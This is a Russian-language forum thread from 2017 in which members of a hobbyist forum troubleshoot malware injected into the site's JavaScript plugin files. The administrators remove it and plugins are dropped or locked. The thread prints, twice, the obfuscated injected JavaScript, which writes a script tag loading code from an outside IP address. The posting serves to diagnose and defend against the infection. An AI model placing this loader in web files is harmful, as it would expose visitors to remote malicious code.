Осторожно, убьёт!

Все вопросы, связанные с форумом

Postby thims » Mon, 19.06.2017 00:39:30

А мне браузер только что сказал, что forum.tslabs.info может угрожать безопасности моего компьютера. В качестве причины указал на то, что форум пытается загрузить данные из 134.249.116.78/jquery.js, что по данным браузера, является вредоносным программным кодом. Такие дела...
User avatar
thims
 
Posts: 139
Joined: Fri, 27.07.2012 17:18:35

Postby TS-Labs » Mon, 19.06.2017 03:40:50

fixed.
В \store\mods\tapatalk-phpbb3\root\mobiquo\smartbanner\appbanner.js обнаружено говно:
Code: Select all
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Алсо, надо апдейтить движло форума (и ёбаный тапатолк вместе с ним, ибо новые релизы только под phpbb 3.1) но с форума послетают всякие примочки, пиленные вручную.
Ждём, пролезет ли говно ещё раз, если да, то таки придётся поразвлечься.
User avatar
TS-Labs
 
Posts: 5398
Joined: Thu, 26.07.2012 01:29:56

Postby nyuk » Mon, 19.06.2017 17:00:12

примочки не нужны. а если с обновлением еще и смайлы слетят, то я просто вот праздник золотого дождя устрою!
не отрастил
User avatar
nyuk
 
Posts: 556
Joined: Thu, 26.07.2012 09:08:24

Postby thims » Wed, 21.06.2017 19:20:08

Опять началось...
User avatar
thims
 
Posts: 139
Joined: Fri, 27.07.2012 17:18:35

Postby TS-Labs » Wed, 21.06.2017 20:53:38

Грохнул тапатолк.
User avatar
TS-Labs
 
Posts: 5398
Joined: Thu, 26.07.2012 01:29:56

Postby TS-Labs » Sun, 25.06.2017 21:52:19

Опять цапануло. Удолил.
Вернул тапатолк. Поставил ридонли на файлы, которые заражало. Против лома нет приёма.
User avatar
TS-Labs
 
Posts: 5398
Joined: Thu, 26.07.2012 01:29:56

Postby creator » Sun, 02.07.2017 22:00:27

Всё равно что-то гаденькое сидит. Перекидывает на h t t p : // www. cpm10. com / watch?key=блаблабла и оттуда далее.
А, влип, очкарик!
User avatar
creator
 
Posts: 248
Joined: Wed, 11.02.2015 11:22:49
ICQ: 471186520
WEBSITE: http://amiga.nsk.ru/
LOCATION: nsk

Postby Alex Rider » Sun, 02.07.2017 23:52:17

+1, Каспер ругается:

02.07.2017 23.50.38
Dangerous URL blocked: http://134.249.116.78/jquery.js
URL listed in database of malicious URLs
Google Chrome
User avatar
Alex Rider
 
Posts: 340
Joined: Tue, 03.06.2014 15:35:47
ICQ: 332230610
LOCATION: Ryazan, Russia

Postby creator » Mon, 03.07.2017 06:39:30

А я сделал так:
Code: Select all
route -p add 134.249.116.78 mask 255.255.255.255 192.168.1.100
:)
А, влип, очкарик!
User avatar
creator
 
Posts: 248
Joined: Wed, 11.02.2015 11:22:49
ICQ: 471186520
WEBSITE: http://amiga.nsk.ru/
LOCATION: nsk

Postby moroz1999 » Thu, 20.07.2017 22:12:55

Какая-то хрень заражает исходники форума, вписывает такие строчки:
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Этому подвержены фрагменты ABBC3_Ajax_indicator и MOD : MSSTI ABBC3 (v3.0.11).

Больше деталей снаружи не видно, зараза перенаправляет на рекламу через какой-то мутный гейт. Ищи траюна на серваке, должон быть где-то. Есть вероятность, что заражает рандомные JS файлы, вписывая в начало файла эту ересь.
User avatar
moroz1999
 
Posts: 1872
Joined: Wed, 01.08.2012 11:23:51

Postby VBI » Fri, 21.07.2017 09:16:15

ХУЁВО
передал вопрос тех.директору

директор сказал обновлять форум
User avatar
VBI
 
Posts: 1965
Joined: Mon, 03.06.2013 09:20:29

Postby moroz1999 » Fri, 21.07.2017 19:53:50

Стопудово есть скриптота на серваке, ищите да обрящете.
User avatar
moroz1999
 
Posts: 1872
Joined: Wed, 01.08.2012 11:23:51

Postby TS-Labs » Sat, 22.07.2017 03:12:00

Для директоров в доступной форме.
Также, директору предлагается сравнить файлы, лежащие в папке форума, с контентом, приезжающим в браузер.
Может тогда обрящет.
User avatar
TS-Labs
 
Posts: 5398
Joined: Thu, 26.07.2012 01:29:56

Postby moroz1999 » Sun, 23.07.2017 18:01:28

Ну, не сам же браузер заражает скачиваемые скрипты? И не прокси в процессе дописывает хвост к яваскриптам.
Там довольно просто же:
1. Есть успешная попытка взлома сервера, в ходе чего на сервер попал вредный вирус/скрипт/заменен файл. Скорее всего, автоматом были найдены файлы с расширением JS и к ним приписан хвост. Еще бывает, что в php файлы вписывают html-кусок, содержащий <script>.
2. Эти модифицированные JS файлы, будучи скачанными браузером, подкачивают payload с названием jquery.js . Что там внутри - хз, может быть что угодно и каждый раз разное.

То есть, чинить надо не jquery, он тут нипричем, чинить надо модифицированные яваскрипты (походу, пострадали плагины форума). Но до этого надо задаться вопросом - как JS файлы были модифицированы?
User avatar
moroz1999
 
Posts: 1872
Joined: Wed, 01.08.2012 11:23:51

Postby moroz1999 » Mon, 07.08.2017 19:27:33

А хостер не может заражать файлы на уровне веб-сервера? Больно уж хитро как-то. Пару раз воспроизведется проблема, а потом надолго тишина.
User avatar
moroz1999
 
Posts: 1872
Joined: Wed, 01.08.2012 11:23:51

Postby VBI » Tue, 08.08.2017 20:45:45

удали нахер этот ABBCode если не хочешь ничего обновлять
User avatar
VBI
 
Posts: 1965
Joined: Mon, 03.06.2013 09:20:29

Postby TS-Labs » Wed, 09.08.2017 10:42:57

удалил нахер потому что нехочу обновлять
ты умеешь обновить этот форум чтоб все нахуй не слетело?
User avatar
TS-Labs
 
Posts: 5398
Joined: Thu, 26.07.2012 01:29:56

Postby VBI » Wed, 09.08.2017 12:59:00

проблема была только в этом бибибикоде.
давай поживём - увидим
User avatar
VBI
 
Posts: 1965
Joined: Mon, 03.06.2013 09:20:29

Postby VBI » Sat, 12.08.2017 10:08:57

r0bat, а что у тебя с аватарой?
User avatar
VBI
 
Posts: 1965
Joined: Mon, 03.06.2013 09:20:29

Postby r0bat » Sat, 12.08.2017 12:57:28

А что у меня с аватарой?
r0bat
 
Posts: 132
Joined: Thu, 26.07.2012 13:33:38

Postby VBI » Sat, 12.08.2017 14:55:03

по твоей ссылке на аватару http://rgho.st/6xP6wPCwh/image.png
меня отправляет на http://meson.ad-l.ink/6xP6wPCwh/image.png
User avatar
VBI
 
Posts: 1965
Joined: Mon, 03.06.2013 09:20:29

Postby r0bat » Sat, 12.08.2017 15:57:27

хз, удолил на всякий случай
r0bat
 
Posts: 132
Joined: Thu, 26.07.2012 13:33:38

Postby WBC » Sat, 12.08.2017 16:34:02

а нефиг аватарки где попало хостить :D
кстати, у себя вирусню не ловил, видать adblockplus+noscript свое дело делают =)
--wbcbz7
User avatar
WBC
 
Posts: 302
Joined: Fri, 19.09.2014 10:23:23
LOCATION: omsk XOR nsk

Postby TS-Labs » Sun, 13.08.2017 14:37:13

VBI wrote:проблема была только в этом бибибикоде.

VBI wrote:по твоей ссылке на аватару

VBI wrote:меня отправляет на

п.1 немного не вяжется в п.2-3, не находишь?
User avatar
TS-Labs
 
Posts: 5398
Joined: Thu, 26.07.2012 01:29:56

Postby WBC » Sun, 13.08.2017 17:12:24

TS-Labs wrote:п.1 немного не вяжется в п.2-3, не находишь?

это конкретно фишка самого рыгхоста
--wbcbz7
User avatar
WBC
 
Posts: 302
Joined: Fri, 19.09.2014 10:23:23
LOCATION: omsk XOR nsk

Next

Return to Forum related

Who is online

Users browsing this forum: No registered users and 0 guests

x